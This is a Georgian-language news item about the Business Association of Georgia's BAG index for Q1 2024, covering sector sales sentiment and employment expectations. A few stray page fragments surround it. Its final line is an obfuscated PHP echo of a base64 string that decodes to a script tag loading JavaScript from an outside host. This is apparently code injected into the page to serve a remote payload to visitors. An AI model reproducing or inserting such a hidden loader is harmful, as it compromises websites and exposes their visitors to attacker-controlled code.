celsiusi
ავერსი საქკაბელი

საქართველოს ბიზნეს ასოციაციის BAG ინდექსის მიხედვით, გაყიდვებში 2024 წლის I კვარტალის მდგომარეობას ყველაზე პოზიტიურად მშენებლობის სექტორი აფასებს. II კვარტალისთვის ყველაზე პოზიტიური მოლოდინი კი ვაჭრობის სექტორში აქვთ, თუმცა I კვარტალის მდგომარეობას გაყიდვების მიმართულებით ყველაზე ნეგატიურად ვაჭრობის სექტორში აფასებენ: ვაჭრობის სექტორში გამოკითხულ კომპანიათა 52%-მა განაცხადა, რომ მათი გაყიდვები მცირდება, რაც 2023 წლის I კვარტალთან შედარებით 24 პროცენტული პუნქტით გაუარესებული მაჩვენებელია.

რაც შეეხება დასაქმებას, I კვარტალში, გამოკითხულთა 30%-მა განაცხადა, რომ მათთან დასაქმებულთა რაოდენობა იზრდება. რაც შეეხება II კვარტალის მოლოდინს, დასაქმებულთა რაოდენობის ზრდას კომპანიების 47% ელის. დასაქმებულთა რაოდენობის შესახებ გასული კვარტალის მდგომარეობას ყველაზე პოზიტიურად მშენებლობის სექტორში აფასებენ და მოლოდინის პოზიტიური შეფასებითაც აღნიშნული სექტორი გამოირჩევა, რაც წინა წლის შესაბამისი პერიოდის მსგავსია.

192
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");